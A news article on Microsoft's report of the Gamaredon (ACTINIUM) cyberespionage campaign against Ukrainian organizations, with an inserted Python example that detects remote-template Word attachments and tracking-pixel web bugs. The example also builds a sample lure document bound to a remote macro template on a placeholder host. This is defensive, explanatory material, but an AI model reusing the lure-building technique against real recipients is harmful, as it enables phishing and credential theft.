Microsoft on Friday shared additional tactics, techniques and procedures (TTPs) used by the Russia-based hacking group Gamaredon to carry out a spate of cyberespionage attacks against multiple organizations in Ukraine over the past six months.
The attacks are said to have singled out government, military, non-governmental organizations (NGOs), the judiciary, law enforcement agencies and non-profit organizations, with the main goals of exfiltrating sensitive information, maintaining access, and using that access to move laterally into related organizations.
The Windows maker's Threat Intelligence Center (MSTIC) tracks the cluster under the name ACTINIUM (formerly DEV-0157), in keeping with its convention of naming nation-state activity after chemical elements.
The Ukrainian government publicly attributed Gamaredon to the Russian Federal Security Service (FSB) in November 2021, linking its operations to Russia’s FSB office in the Republic of Crimea and the city of Sevastopol.
"Since October 2021, ACTINIUM has been targeting or compromising accounts at organizations critical to emergency response and to ensuring the security of Ukrainian territory, as well as organizations that would be involved in coordinating the distribution of international and humanitarian aid to Ukraine in a crisis," MSTIC researchers said.
It should be noted that the Gamaredon activity is a distinct set of attacks, separate from last month's cyber offensives that crippled several Ukrainian government agencies and companies with destructive data-wiping malware disguised as ransomware.
The attacks primarily use spear-phishing emails as the initial access vector. The messages carry document attachments that reference a remote template; the malicious macro code lives in that template and is fetched only when the recipient opens the document, which keeps the macro out of the attachment itself.
In an interesting tactic, the operators also embed a tracking pixel-like "web bug" in the body of the phishing message to monitor whether it has been opened. Opening the attachment then kicks off a multi-stage infection chain that culminates in the deployment of several binaries, including:
- PowerPunch – a PowerShell-based dropper and downloader used to remotely fetch the next-stage executables
- Pterodo – an ever-evolving, feature-rich backdoor that also includes a number of features designed to complicate analysis, and
- QuietSieve – a heavily obfuscated .NET binary built specifically for data exfiltration and reconnaissance on the target host
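The two delivery tricks described above, a macro-bearing remote template that is pulled in when the attachment is opened and a web bug in the message body, can both be checked for statically before a document or mail reaches a user. The following is an added example written for this page, not code from the Microsoft report or from the article; the `.docx` builder and the e-mail body are constructed sample inputs, and the `.invalid` hostnames are placeholders:

```python
"""
Added example: static checks for a remote-template attachment and a
tracking-pixel web bug. Sample documents and mail body are constructed here;
hostnames use the reserved .invalid TLD.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from html.parser import HTMLParser
from urllib.parse import urlparse
from xml.sax.saxutils import escape

# A .docx is a ZIP archive. A document bound to a template carries, in
# word/_rels/settings.xml.rels, a Relationship of type .../attachedTemplate.
# Word resolves its Target when the file is opened, so a macro-bearing .dotm on
# an attacker-controlled host runs even though the .docx itself holds no macro.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def _is_remote(target):
    """True when resolving the target means a network fetch (HTTP/FTP or UNC).
    A local file:///C:/... path is how an ordinary template is bound to a
    document and is deliberately not flagged."""
    p = urlparse(target)
    if p.scheme in ("http", "https", "ftp"):
        return True
    if p.scheme == "file" and p.netloc not in ("", "localhost"):
        return True                     # file://host/share/x.dotm is an SMB fetch
    return target.startswith("\\\\")    # bare UNC path


def find_remote_templates(docx_bytes):
    """Return the external template URLs the document would fetch on open."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if SETTINGS_RELS not in z.namelist():
            return hits
        root = ET.fromstring(z.read(SETTINGS_RELS))
        for rel in root.iter("{%s}Relationship" % RELS_NS):
            if rel.get("Type") != ATTACHED_TEMPLATE:
                continue
            target = rel.get("Target", "")
            if rel.get("TargetMode") == "External" and _is_remote(target):
                hits.append(target)
    return hits


def build_docx(template_target=None):
    """Constructed minimal .docx. With template_target set, the settings part
    is bound to that template, which is how a remote-template lure is built."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="%s"><w:body/></w:document>' % W_NS)
        if template_target is not None:
            z.writestr("word/settings.xml",
                       '<w:settings xmlns:w="%s" xmlns:r="%s">'
                       '<w:attachedTemplate r:id="rId1"/></w:settings>' % (W_NS, R_NS))
            z.writestr(SETTINGS_RELS,
                       '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s" '
                       'Target="%s" TargetMode="External"/></Relationships>'
                       % (RELS_NS, ATTACHED_TEMPLATE,
                          escape(template_target, {'"': "&quot;"})))
    return buf.getvalue()


class _WebBugParser(HTMLParser):
    """Collect remotely hosted images sized or styled to be invisible."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        if not src.lower().startswith(("http://", "https://")):
            return                      # inline cid:/data: images cause no callback
        tiny = all(a.get(k, "").strip().rstrip("px") in ("0", "1")
                   for k in ("width", "height"))
        hidden = "display:none" in a.get("style", "").replace(" ", "").lower()
        if tiny or hidden:
            self.hits.append(src)


def find_web_bugs(html):
    """Return the URLs a mail client would fetch purely to signal 'opened'."""
    p = _WebBugParser()
    p.feed(html)
    return p.hits


SAMPLE_MAIL = (  # constructed phishing body: one beacon, one ordinary logo
    '<html><body><p>Please review the attached document.</p>'
    '<img src="https://beacon.invalid/p.gif?r=7f3a" width="1" height="1">'
    '<img src="https://cdn.invalid/logo.png" width="200" height="60">'
    '</body></html>')

if __name__ == "__main__":
    lure = build_docx("https://templates.invalid/invoice.dotm")
    print("remote templates:", find_remote_templates(lure))
    print("web bugs:", find_web_bugs(SAMPLE_MAIL))
```

The template check keys on the relationship type rather than on file extension or on the presence of `vbaProject.bin`, because a remote-template lure contains no macro of its own; the same check applies to `.dotx`/`.docm` packages, which use the identical `settings.xml.rels` layout. Treating `file://server/share` and bare UNC targets as remote matters in practice, since a template pulled over SMB also leaks the user's NTLM credentials to the server.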
"While the QuietSieve malware family is primarily aimed at exfiltrating data from the compromised host, it can also receive and execute a remote payload from the operator," the researchers explained, noting that it also captures screenshots of the compromised host roughly every five minutes.
This is far from the threat actor's only recent activity: last month it also hit an unnamed Western government entity in Ukraine with a malware-laced résumé sent in response to an active job listing the entity had posted on a local job portal. In December 2021, the country's State Migration Service (SMS) was also targeted.
The findings also come as Cisco Talos, in its ongoing analysis of the January incidents, revealed details of a disinformation campaign, dating back at least nine months, that attempts to attribute the defacement and wiper attacks to Ukrainian groups.